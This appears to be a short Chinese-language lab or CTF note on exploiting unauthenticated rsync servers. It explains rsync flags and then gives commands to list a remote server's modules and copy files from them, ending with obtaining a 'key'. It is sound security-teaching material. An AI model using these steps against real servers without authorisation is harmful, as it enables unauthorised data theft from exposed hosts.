漏洞简介
Rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员
优点:速度非常快,因为只同步文件当中不同的地方
Rsync默认端口:873
常用指令:
-v, --verbose 详细模式输出。
-q, --quiet 精简输出模式。
-c, --checksum 打开校验开关,强制对文件传输进行校验。
-a, --archive 归档模式,表示以递归方式传输文件,并保持所有文件属性,等于-rlptgoD。
-r, --recursive 对子目录以递归模式处理。
-R, --relative 使用相对路径信息。
-b, --backup 创建备份,也就是对于目的已经存在有同样的文件名时,将老的文件重新命名为~filename。可以使用–suffix选项来指定不同的备份文件前缀。
–backup-dir 将备份文件(如~filename)存放在在目录下。
基本命令
rsync IP:: //这是在默认条件下没有改变默认的端口,默认密码是::
rsync --port=xxx ip:: //如果修改了默认端口就需要指定端口,这里就是需要自己指定47900端口
rsync -avz ip::www /tmp
rsync -avz --port=xxx ip::dddd /tmp //-avz是下载文件的命令,前一个是目标内容,后一个是自己指定存储在本地的路径
漏洞复现
1.查看服务器目录 命令: rsync --port=端口号 ip::
2.查看服务器目录下的文件 命令: rsync --port=端口号 ip::目录名
3.把服务器目录下的文件拷贝下来 命令: rsync --port=端口号 ip::目录名 ./
拿到key
